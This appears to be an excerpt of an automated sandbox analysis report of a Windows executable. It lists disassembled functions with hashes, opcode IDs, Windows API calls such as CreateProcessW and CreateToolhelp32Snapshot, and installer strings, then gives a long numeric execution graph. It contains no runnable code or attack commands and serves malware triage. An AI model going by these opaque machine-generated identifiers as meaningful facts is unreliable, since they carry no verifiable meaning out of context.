                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                          Execution Graph

                                          Execution Coverage: 4%
                                          Dynamic/Decrypted Code Coverage: 0%
                                          Signature Coverage: 2.2%
                                          Total number of Nodes: 2000
                                          Total number of Limit Nodes: 107
                                          execution_graph 97916 b9a88 97919 b86e0 97916->97919 97920 b86fd 97919->97920 97921 f0fad 97920->97921 97922 f0ff8 97920->97922 97937 b8724 97920->97937 97925 f0fb5 97921->97925 97928 f0fc2 97921->97928 97921->97937 97994 12aad0 299 API calls __cinit 97922->97994 97992 12b0e4 299 API calls 97925->97992 97933 b898d 97928->97933 97993 12b58c 299 API calls 3 library calls 97928->97993 97931 f1289 97931->97931 97932 b3c30 68 API calls 97932->97937 97938 b8a17 97933->97938 98002 11a48d 89 API calls 4 library calls 97933->98002 97934 f11af 98001 12ae3b 89 API calls 97934->98001 97937->97932 97937->97933 97937->97934 97937->97938 97944 b3f42 68 API calls 97937->97944 97948 b53b0 97937->97948 97976 b39be 97937->97976 97980 b3938 68 API calls 97937->97980 97981 b855e 299 API calls 97937->97981 97982 b5278 97937->97982 97987 d2f70 97937->97987 97990 b84e2 89 API calls 97937->97990 97991 b835f 299 API calls 97937->97991 97995 b523c 59 API calls 97937->97995 97996 1073ab 59 API calls 97937->97996 97997 c1c9c 97937->97997 97944->97937 97949 b53cf 97948->97949 97969 b53fd Mailbox 97948->97969 98003 d0fe6 97949->98003 97950 d2f70 67 API calls __cinit 97950->97969 97952 b69fa 97953 c1c9c 59 API calls 97952->97953 97973 b5569 Mailbox 97953->97973 97954 b69ff 97955 ef165 97954->97955 97956 ee691 97954->97956 98019 11a48d 89 API calls 4 library calls 97955->98019 98015 11a48d 89 API calls 4 library calls 97956->98015 97960 ee6a0 97960->97937 97961 d0fe6 59 API calls Mailbox 97961->97969 97962 b5a1a 98018 11a48d 89 API calls 4 library calls 97962->98018 97963 c1c9c 59 API calls 97963->97969 97965 eea9a 97968 c1c9c 59 API calls 97965->97968 97966 c1207 59 API calls 97966->97969 97968->97973 97969->97950 97969->97952 97969->97954 97969->97956 97969->97961 97969->97962 97969->97963 97969->97965 97969->97966 97970 eeb67 97969->97970 97972 107aad 59 API calls 97969->97972 97969->97973 97974 eef28 97969->97974 98013 b7e50 299 API calls 2 library 
calls 97969->98013 98014 b6e30 60 API calls Mailbox 97969->98014 97970->97973 98016 107aad 59 API calls 97970->98016 97972->97969 97973->97937 98017 11a48d 89 API calls 4 library calls 97974->98017 97977 b39c9 97976->97977 97979 b39f0 97977->97979 98048 b3ea3 68 API calls Mailbox 97977->98048 97979->97937 97980->97937 97981->97937 97983 d0fe6 Mailbox 59 API calls 97982->97983 97984 b5285 97983->97984 97986 b5294 97984->97986 98049 c1a36 97984->98049 97986->97937 98053 d2e74 97987->98053 97989 d2f7b 97989->97937 97990->97937 97991->97937 97992->97928 97993->97933 97994->97937 97995->97937 97996->97937 97998 c1caf 97997->97998 97999 c1ca7 97997->97999 97998->97937 98131 c1bcc 59 API calls 2 library calls 97999->98131 98001->97933 98002->97931 98005 d0fee 98003->98005 98006 d1008 98005->98006 98008 d100c std::exception::exception 98005->98008 98020 d593c 98005->98020 98037 d35d1 DecodePointer 98005->98037 98006->97969 98038 d87cb RaiseException 98008->98038 98010 d1036 98039 d8701 58 API calls _free 98010->98039 98012 d1048 98012->97969 98013->97969 98014->97969 98015->97960 98016->97973 98017->97962 98018->97973 98019->97973 98021 d59b7 98020->98021 98025 d5948 98020->98025 98046 d35d1 DecodePointer 98021->98046 98023 d59bd 98047 d8d58 58 API calls __getptd_noexit 98023->98047 98024 d5953 98024->98025 98040 da39b 58 API calls __NMSG_WRITE 98024->98040 98041 da3f8 58 API calls 6 library calls 98024->98041 98042 d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98024->98042 98025->98024 98028 d597b RtlAllocateHeap 98025->98028 98031 d59a3 98025->98031 98035 d59a1 98025->98035 98043 d35d1 DecodePointer 98025->98043 98028->98025 98029 d59af 98028->98029 98029->98005 98044 d8d58 58 API calls __getptd_noexit 98031->98044 98045 d8d58 58 API calls __getptd_noexit 98035->98045 98037->98005 98038->98010 98039->98012 98040->98024 98041->98024 98043->98025 98044->98035 98045->98029 98046->98023 98047->98029 98048->97979 98050 c1a45 __wsetenvp _memmove 
98049->98050 98051 d0fe6 Mailbox 59 API calls 98050->98051 98052 c1a83 98051->98052 98052->97986 98054 d2e80 __commit 98053->98054 98061 d3447 98054->98061 98060 d2ea7 __commit 98060->97989 98078 d9e3b 98061->98078 98063 d2e89 98064 d2eb8 DecodePointer DecodePointer 98063->98064 98065 d2ee5 98064->98065 98066 d2e95 98064->98066 98065->98066 98124 d89d4 59 API calls __commit 98065->98124 98075 d2eb2 98066->98075 98068 d2f48 EncodePointer EncodePointer 98068->98066 98069 d2ef7 98069->98068 98070 d2f1c 98069->98070 98125 d8a94 61 API calls 2 library calls 98069->98125 98070->98066 98074 d2f36 EncodePointer 98070->98074 98126 d8a94 61 API calls 2 library calls 98070->98126 98073 d2f30 98073->98066 98073->98074 98074->98068 98127 d3450 98075->98127 98079 d9e4c 98078->98079 98080 d9e5f EnterCriticalSection 98078->98080 98085 d9ec3 98079->98085 98080->98063 98082 d9e52 98082->98080 98109 d32e5 58 API calls 3 library calls 98082->98109 98086 d9ecf __commit 98085->98086 98087 d9ed8 98086->98087 98088 d9ef0 98086->98088 98110 da39b 58 API calls __NMSG_WRITE 98087->98110 98096 d9f11 __commit 98088->98096 98113 d8a4d 58 API calls 2 library calls 98088->98113 98091 d9edd 98111 da3f8 58 API calls 6 library calls 98091->98111 98092 d9f05 98094 d9f0c 98092->98094 98095 d9f1b 98092->98095 98114 d8d58 58 API calls __getptd_noexit 98094->98114 98099 d9e3b __lock 58 API calls 98095->98099 98096->98082 98097 d9ee4 98112 d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98097->98112 98101 d9f22 98099->98101 98103 d9f2f 98101->98103 98104 d9f47 98101->98104 98115 da05b InitializeCriticalSectionAndSpinCount 98103->98115 98116 d2f85 98104->98116 98107 d9f3b 98122 d9f63 LeaveCriticalSection _doexit 98107->98122 98110->98091 98111->98097 98113->98092 98114->98096 98115->98107 98117 d2f8e RtlFreeHeap 98116->98117 98121 d2fb7 __dosmaperr 98116->98121 98118 d2fa3 98117->98118 98117->98121 98123 d8d58 58 API calls __getptd_noexit 98118->98123 98120 d2fa9 GetLastError 
98120->98121 98121->98107 98122->98096 98123->98120 98124->98069 98125->98070 98126->98073 98130 d9fa5 LeaveCriticalSection 98127->98130 98129 d2eb7 98129->98060 98130->98129 98131->97998 98132 b9a6c 98135 b829c 98132->98135 98134 b9a78 98136 b82b4 98135->98136 98143 b8308 98135->98143 98137 b53b0 299 API calls 98136->98137 98136->98143 98141 b82eb 98137->98141 98139 f0ed8 98139->98139 98140 b8331 98140->98134 98141->98140 98144 b523c 59 API calls 98141->98144 98143->98140 98145 11a48d 89 API calls 4 library calls 98143->98145 98144->98143 98145->98139 98146 b6981 98153 b373a 98146->98153 98148 b6997 98162 b7b3f 98148->98162 98150 b69bf 98151 b584d 98150->98151 98174 11a48d 89 API calls 4 library calls 98150->98174 98154 b3758 98153->98154 98155 b3746 98153->98155 98157 b375e 98154->98157 98158 b3787 98154->98158 98175 b523c 59 API calls 98155->98175 98159 d0fe6 Mailbox 59 API calls 98157->98159 98176 b523c 59 API calls 98158->98176 98161 b3750 98159->98161 98161->98148 98164 b7b64 _wcscmp 98162->98164 98177 c162d 98162->98177 98165 c1a36 59 API calls 98164->98165 98166 b7b98 Mailbox 98164->98166 98167 effad 98165->98167 98166->98150 98166->98166 98182 c17e0 98167->98182 98171 effc9 98173 effcd Mailbox 98171->98173 98192 b523c 59 API calls 98171->98192 98173->98150 98174->98151 98175->98161 98176->98161 98178 d0fe6 Mailbox 59 API calls 98177->98178 98179 c1652 98178->98179 98180 d0fe6 Mailbox 59 API calls 98179->98180 98181 c1660 98180->98181 98181->98164 98183 ff401 98182->98183 98184 c17f2 98182->98184 98199 1087f9 59 API calls _memmove 98183->98199 98193 c1680 98184->98193 98187 c17fe 98191 b3938 68 API calls 98187->98191 98188 ff40b 98189 c1c9c 59 API calls 98188->98189 98190 ff413 Mailbox 98189->98190 98191->98171 98192->98173 98194 c1692 98193->98194 98196 c16ba _memmove 98193->98196 98195 d0fe6 Mailbox 59 API calls 98194->98195 98194->98196 98197 c176f _memmove 98195->98197 98196->98187 98198 d0fe6 Mailbox 59 API calls 98197->98198 98198->98197 98199->98188 
98200 b1066 98201 b106c 98200->98201 98202 d2f70 __cinit 67 API calls 98201->98202 98203 b1076 98202->98203 98204 ee463 98205 b373a 59 API calls 98204->98205 98206 ee479 98205->98206 98207 ee48f 98206->98207 98209 ee4fa 98206->98209 98258 b5376 60 API calls 98207->98258 98216 bb020 98209->98216 98212 ee4ce 98215 ee4ee Mailbox 98212->98215 98259 11890a 59 API calls Mailbox 98212->98259 98213 ef046 Mailbox 98215->98213 98260 11a48d 89 API calls 4 library calls 98215->98260 98261 c3740 98216->98261 98219 f30b6 98357 11a48d 89 API calls 4 library calls 98219->98357 98220 bb07f 98220->98219 98222 f30d4 98220->98222 98233 bb132 Mailbox _memmove 98220->98233 98254 bbb86 98220->98254 98358 11a48d 89 API calls 4 library calls 98222->98358 98224 f355e 98257 bb4dd 98224->98257 98369 11a48d 89 API calls 4 library calls 98224->98369 98225 f3106 98226 f318a 98225->98226 98359 ba9de 299 API calls 98225->98359 98226->98257 98360 11a48d 89 API calls 4 library calls 98226->98360 98228 10730a 59 API calls 98228->98233 98233->98224 98233->98225 98233->98228 98235 b53b0 299 API calls 98233->98235 98236 b3b31 59 API calls 98233->98236 98239 f3418 98233->98239 98245 f31c3 98233->98245 98246 b3c30 68 API calls 98233->98246 98248 f346f 98233->98248 98252 c1c9c 59 API calls 98233->98252 98253 b523c 59 API calls 98233->98253 98233->98254 98255 d0fe6 59 API calls Mailbox 98233->98255 98233->98257 98266 b3add 98233->98266 98273 bbc70 98233->98273 98354 b3a40 59 API calls Mailbox 98233->98354 98355 b5190 59 API calls Mailbox 98233->98355 98362 106c62 59 API calls 2 library calls 98233->98362 98363 12a9c3 85 API calls Mailbox 98233->98363 98364 106c1e 59 API calls Mailbox 98233->98364 98365 115ef2 68 API calls 98233->98365 98366 b3ea3 68 API calls Mailbox 98233->98366 98368 11a12a 59 API calls 98233->98368 98235->98233 98236->98233 98240 b53b0 299 API calls 98239->98240 98242 f3448 98240->98242 98247 b39be 68 API calls 98242->98247 98242->98257 98361 11a48d 89 API calls 4 library calls 
98245->98361 98246->98233 98247->98248 98367 11a48d 89 API calls 4 library calls 98248->98367 98252->98233 98253->98233 98356 11a48d 89 API calls 4 library calls 98254->98356 98255->98233 98257->98215 98258->98212 98259->98215 98260->98213 98262 c374f 98261->98262 98265 c376a 98261->98265 98370 c1aa4 98262->98370 98264 c3757 CharUpperBuffW 98264->98265 98265->98220 98267 ed3cd 98266->98267 98268 b3aee 98266->98268 98269 d0fe6 Mailbox 59 API calls 98268->98269 98270 b3af5 98269->98270 98271 b3b16 98270->98271 98374 b3ba5 59 API calls Mailbox 98270->98374 98271->98233 98274 f359f 98273->98274 98285 bbc95 98273->98285 98492 11a48d 89 API calls 4 library calls 98274->98492 98276 bbf3b 98276->98233 98280 bc2b6 98280->98276 98281 bc2c3 98280->98281 98490 bc483 299 API calls Mailbox 98281->98490 98284 bc2ca LockWindowUpdate DestroyWindow GetMessageW 98284->98276 98286 bc2fc 98284->98286 98346 bbca5 Mailbox 98285->98346 98493 b5376 60 API calls 98285->98493 98494 10700c 299 API calls 98285->98494 98287 f4509 TranslateMessage DispatchMessageW GetMessageW 98286->98287 98287->98287 98289 f4539 98287->98289 98288 f36b3 Sleep 98288->98346 98289->98276 98290 bbf54 timeGetTime 98290->98346 98291 f405d WaitForSingleObject 98296 f407d GetExitCodeProcess CloseHandle 98291->98296 98291->98346 98293 c1c9c 59 API calls 98293->98346 98294 bc210 Sleep 98327 bc1fa Mailbox 98294->98327 98303 bc36b 98296->98303 98297 d0fe6 59 API calls Mailbox 98297->98346 98298 f43a9 Sleep 98298->98327 98300 d083e timeGetTime 98300->98327 98301 b6cd8 277 API calls 98301->98346 98303->98233 98304 bc324 timeGetTime 98491 b5376 60 API calls 98304->98491 98307 f4440 GetExitCodeProcess 98311 f446c CloseHandle 98307->98311 98312 f4456 WaitForSingleObject 98307->98312 98309 b6d79 109 API calls 98309->98346 98311->98327 98312->98311 98312->98346 98313 136562 110 API calls 98313->98327 98315 f38aa Sleep 98315->98346 98316 f44c8 Sleep 98316->98346 98319 c1a36 59 API calls 98319->98327 98321 b5376 60 API calls 
98321->98346 98324 bc26d 98330 c1a36 59 API calls 98324->98330 98325 bb020 277 API calls 98325->98346 98327->98294 98327->98300 98327->98303 98327->98307 98327->98313 98327->98315 98327->98316 98327->98319 98327->98346 98519 c1207 98327->98519 98524 112baf 60 API calls 98327->98524 98525 b5376 60 API calls 98327->98525 98526 b3ea3 68 API calls Mailbox 98327->98526 98527 b6cd8 299 API calls 98327->98527 98568 1070e2 59 API calls 98327->98568 98569 1157ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98327->98569 98570 114148 CreateToolhelp32Snapshot Process32FirstW 98327->98570 98328 c1a36 59 API calls 98328->98346 98333 bbf25 Mailbox 98330->98333 98331 11a48d 89 API calls 98331->98346 98333->98276 98489 bc460 10 API calls Mailbox 98333->98489 98336 b39be 68 API calls 98336->98346 98337 b53b0 277 API calls 98337->98346 98338 106cf1 59 API calls Mailbox 98338->98346 98340 b3ea3 68 API calls 98340->98346 98341 f3e13 VariantClear 98341->98346 98342 f3ea9 VariantClear 98342->98346 98343 107aad 59 API calls 98343->98346 98344 f3c57 VariantClear 98344->98346 98345 b41c4 59 API calls Mailbox 98345->98346 98346->98288 98346->98290 98346->98291 98346->98293 98346->98294 98346->98297 98346->98298 98346->98301 98346->98303 98346->98304 98346->98309 98346->98321 98346->98324 98346->98325 98346->98327 98346->98328 98346->98331 98346->98333 98346->98336 98346->98337 98346->98338 98346->98340 98346->98341 98346->98342 98346->98343 98346->98344 98346->98345 98347 b5190 59 API calls Mailbox 98346->98347 98375 b52b0 98346->98375 98384 b9a00 98346->98384 98391 b9c80 98346->98391 98422 ba820 98346->98422 98439 11c270 98346->98439 98446 11e4a0 98346->98446 98449 11412a 98346->98449 98452 11bcd6 98346->98452 98482 c42cf 98346->98482 98486 12e60c 98346->98486 98495 136655 59 API calls 98346->98495 98496 11a058 59 API calls Mailbox 98346->98496 98497 10e0aa 59 API calls 98346->98497 98498 b4d37 98346->98498 98516 106c62 59 API calls 2 library calls 
98346->98516 98517 b38ff 59 API calls 98346->98517 98518 b3a40 59 API calls Mailbox 98346->98518 98528 12c355 98346->98528 98347->98346 98354->98233 98355->98233 98356->98219 98357->98257 98358->98257 98359->98226 98360->98257 98361->98257 98362->98233 98363->98233 98364->98233 98365->98233 98366->98233 98367->98257 98368->98233 98369->98257 98371 c1ab7 98370->98371 98373 c1ab4 _memmove 98370->98373 98372 d0fe6 Mailbox 59 API calls 98371->98372 98372->98373 98373->98264 98374->98271 98376 b52c6 98375->98376 98378 b5313 98375->98378 98377 b52d3 PeekMessageW 98376->98377 98376->98378 98377->98378 98379 b52ec 98377->98379 98378->98379 98381 b533e PeekMessageW 98378->98381 98382 b5352 TranslateMessage DispatchMessageW 98378->98382 98383 edf68 TranslateAcceleratorW 98378->98383 98580 b359e 98378->98580 98379->98346 98381->98378 98381->98379 98382->98381 98383->98378 98383->98381 98385 b9a1d 98384->98385 98386 b9a31 98384->98386 98585 b94e0 98385->98585 98619 11a48d 89 API calls 4 library calls 98386->98619 98388 b9a28 98388->98346 98390 f2478 98390->98390 98392 b9cb5 98391->98392 98393 f247d 98392->98393 98397 b9d1f 98392->98397 98398 b9d79 98392->98398 98394 b53b0 299 API calls 98393->98394 98395 f2492 98394->98395 98419 b9f50 Mailbox 98395->98419 98629 11a48d 89 API calls 4 library calls 98395->98629 98396 c1207 59 API calls 98396->98398 98397->98398 98400 c1207 59 API calls 98397->98400 98398->98396 98401 d2f70 __cinit 67 API calls 98398->98401 98403 f24fa 98398->98403 98408 b9f3a 98398->98408 98398->98419 98402 f24d8 98400->98402 98401->98398 98404 d2f70 __cinit 67 API calls 98402->98404 98403->98346 98404->98398 98405 11a48d 89 API calls 98405->98419 98406 b39be 68 API calls 98406->98419 98408->98419 98630 11a48d 89 API calls 4 library calls 98408->98630 98409 b4230 59 API calls 98409->98419 98410 ba775 98634 11a48d 89 API calls 4 library calls 98410->98634 98414 b53b0 299 API calls 98414->98419 98415 f27f9 98415->98346 98419->98405 98419->98406 98419->98409 
98419->98410 98419->98414 98421 ba058 98419->98421 98628 c1bcc 59 API calls 2 library calls 98419->98628 98631 107aad 59 API calls 98419->98631 98632 12ccac 299 API calls 98419->98632 98633 12bc26 299 API calls Mailbox 98419->98633 98635 b5190 59 API calls Mailbox 98419->98635 98636 129ab0 299 API calls Mailbox 98419->98636 98421->98346 98423 f2d51 98422->98423 98425 ba84c 98422->98425 98638 11a48d 89 API calls 4 library calls 98423->98638 98427 f2d6a 98425->98427 98435 ba888 _memmove 98425->98435 98426 f2d62 98426->98346 98639 11a48d 89 API calls 4 library calls 98427->98639 98430 d0fe6 59 API calls Mailbox 98430->98435 98431 f2dae 98640 ba9de 299 API calls 98431->98640 98433 b53b0 299 API calls 98433->98435 98434 f2dc8 98436 ba975 98434->98436 98641 11a48d 89 API calls 4 library calls 98434->98641 98435->98430 98435->98431 98435->98433 98435->98434 98435->98436 98437 ba962 98435->98437 98436->98346 98437->98436 98637 12a9c3 85 API calls Mailbox 98437->98637 98440 b4d37 84 API calls 98439->98440 98441 11c286 98440->98441 98642 114005 98441->98642 98443 11c28e 98444 11c292 GetLastError 98443->98444 98445 11c2a7 98443->98445 98444->98445 98445->98346 98786 11f87d 98446->98786 98448 11e4b0 98448->98346 98917 11494a GetFileAttributesW 98449->98917 98453 11bdbb Mailbox 98452->98453 98454 11bcf5 98452->98454 98456 b4d37 84 API calls 98453->98456 98465 11bdc3 Mailbox 98453->98465 98921 b502b 98454->98921 98458 11bdf3 98456->98458 98457 11bd00 98460 b502b 59 API calls 98457->98460 98459 b4d37 84 API calls 98458->98459 98461 11be05 98459->98461 98462 11bd14 98460->98462 98937 113ce2 98461->98937 98462->98453 98464 c1207 59 API calls 98462->98464 98466 11bd25 98464->98466 98465->98346 98467 c1207 59 API calls 98466->98467 98468 11bd2e 98467->98468 98469 b4d37 84 API calls 98468->98469 98470 11bd3b 98469->98470 98471 d0119 59 API calls 98470->98471 98472 11bd4e 98471->98472 98473 c17e0 59 API calls 98472->98473 98474 11bd5f 98473->98474 98475 11412a 3 API calls 98474->98475 
98481 11bd88 Mailbox 98474->98481 98477 11bd6e 98475->98477 98476 b502b 59 API calls 98476->98453 98478 c1a36 59 API calls 98477->98478 98477->98481 98479 11bd7f 98478->98479 98925 113f1d 98479->98925 98481->98476 98483 c42e8 98482->98483 98484 c42d9 98482->98484 98483->98484 98485 c42ed CloseHandle 98483->98485 98484->98346 98485->98484 99061 12d1c6 98486->99061 98488 12e61c 98488->98346 98489->98280 98490->98284 98491->98346 98492->98285 98493->98285 98494->98285 98495->98346 98496->98346 98497->98346 98499 b4d51 98498->98499 98507 b4d4b 98498->98507 98500 edb28 __i64tow 98499->98500 98501 b4d99 98499->98501 98502 b4d57 __itow 98499->98502 98506 eda2f 98499->98506 99171 d38c8 83 API calls 3 library calls 98501->99171 98504 d0fe6 Mailbox 59 API calls 98502->98504 98508 b4d71 98504->98508 98509 d0fe6 Mailbox 59 API calls 98506->98509 98514 edaa7 Mailbox _wcscpy 98506->98514 98507->98346 98508->98507 98510 c1a36 59 API calls 98508->98510 98511 eda74 98509->98511 98510->98507 98512 d0fe6 Mailbox 59 API calls 98511->98512 98513 eda9a 98512->98513 98513->98514 98515 c1a36 59 API calls 98513->98515 99172 d38c8 83 API calls 3 library calls 98514->99172 98515->98514 98516->98346 98517->98346 98518->98346 98520 d0fe6 Mailbox 59 API calls 98519->98520 98521 c1228 98520->98521 98522 d0fe6 Mailbox 59 API calls 98521->98522 98523 c1236 98522->98523 98523->98327 98524->98327 98525->98327 98526->98327 98527->98327 98529 12c380 98528->98529 98530 12c39a 98528->98530 99200 11a48d 89 API calls 4 library calls 98529->99200 99173 12a8fd 98530->99173 98534 b53b0 298 API calls 98535 12c406 98534->98535 98536 12c498 98535->98536 98540 12c447 98535->98540 98561 12c392 Mailbox 98535->98561 98537 12c4ee 98536->98537 98538 12c49e 98536->98538 98539 b4d37 84 API calls 98537->98539 98537->98561 99201 117ed5 59 API calls 98538->99201 98541 12c500 98539->98541 98545 11789a 59 API calls 98540->98545 98543 c1aa4 59 API calls 98541->98543 98546 12c524 CharUpperBuffW 98543->98546 98544 12c4c1 99202 
c35b9 59 API calls Mailbox 98544->99202 98548 12c477 98545->98548 98551 12c53e 98546->98551 98550 106ebc 298 API calls 98548->98550 98549 12c4c9 Mailbox 98555 bb020 298 API calls 98549->98555 98550->98561 98552 12c591 98551->98552 98553 12c545 98551->98553 98554 b4d37 84 API calls 98552->98554 99180 11789a 98553->99180 98556 12c599 98554->98556 98555->98561 99203 b5376 60 API calls 98556->99203 98561->98346 98562 12c5a3 98562->98561 98563 b4d37 84 API calls 98562->98563 98564 12c5be 98563->98564 99204 c35b9 59 API calls Mailbox 98564->99204 98566 12c5ce 98567 bb020 298 API calls 98566->98567 98567->98561 98568->98327 98569->98327 99231 114ce2 98570->99231 98572 114195 Process32NextW 98573 114244 CloseHandle 98572->98573 98574 11418e Mailbox 98572->98574 98573->98327 98574->98572 98574->98573 98575 c1207 59 API calls 98574->98575 98576 c1a36 59 API calls 98574->98576 98577 d0119 59 API calls 98574->98577 98578 c17e0 59 API calls 98574->98578 98579 c151f 61 API calls 98574->98579 98575->98574 98576->98574 98577->98574 98578->98574 98579->98574 98581 b35e2 98580->98581 98584 b35b0 98580->98584 98581->98378 98582 b35d5 IsDialogMessageW 98582->98581 98582->98584 98583 ed273 GetClassLongW 98583->98582 98583->98584 98584->98581 